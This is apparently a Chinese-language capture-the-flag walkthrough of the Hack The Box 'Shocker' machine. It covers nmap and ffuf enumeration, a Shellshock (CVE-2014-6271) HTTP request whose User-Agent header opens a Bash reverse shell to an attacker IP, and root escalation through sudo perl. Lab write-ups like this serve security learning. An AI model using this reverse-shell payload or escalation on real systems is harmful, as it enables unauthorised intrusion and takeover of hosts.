Shocker

nmap扫描

sudo nmap -T4 -Pn 10.10.10.56

扫描发现开放80,2222

扫描路径

ffuf -u "http://10.10.10.56/FUZZ" -w /usr/share/dirb/wordlists/common.txt -t 50

#FUZZ是关键字

-u url
-t 线程数
-w 字典路径

#github
https://github.com/ffuf/ffuf

扫描到 cgi-bin 目录

换个字典,对cgi-bin继续fuzz

什么也没扫到,后面看答案发现这个路径下有个 user.sh,我的路径字典没有。

查看user.sh

根据经验,发现这里存在 Bash Shellshock注入漏洞

漏洞英文名称  Bash Shellshock
中文命名    破壳(X-CERT)
威胁响应等级  A级
漏洞相关CVE编号   CVE-2014-6271
漏洞发现者   Stéphane Chazelas(法国)
漏洞发现事件  2014年9月中旬
漏洞公布时间  9月25日
漏洞影响对象  bash 1.14至bash 4.3的Linux/Unix系统 

漏洞详情

https://wooyun.js.org/drops/Shellshock漏洞回顾与分析测试.html

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271

漏洞利用:

反弹shell

GET /cgi-bin/user.sh HTTP/1.1
Host: 10.10.10.56
User-Agent:  () { :;};/bin/bash -i >& /dev/tcp/10.10.14.22/23333 0>&1

先拿一个flag

find / -name 'user.txt' 2>/dev/null

#过滤错误信
2>/dev/null

提权:

使用 sudo -l 查看得知有权限使用 sudo 运行 /usr/bin/perl

sudo -l

执行

sudo /usr/bin/perl -e 'exec "/bin/bash";'

拿到root权限,

find / -name 'root.txt' 2>/dev/null
上一页
下一页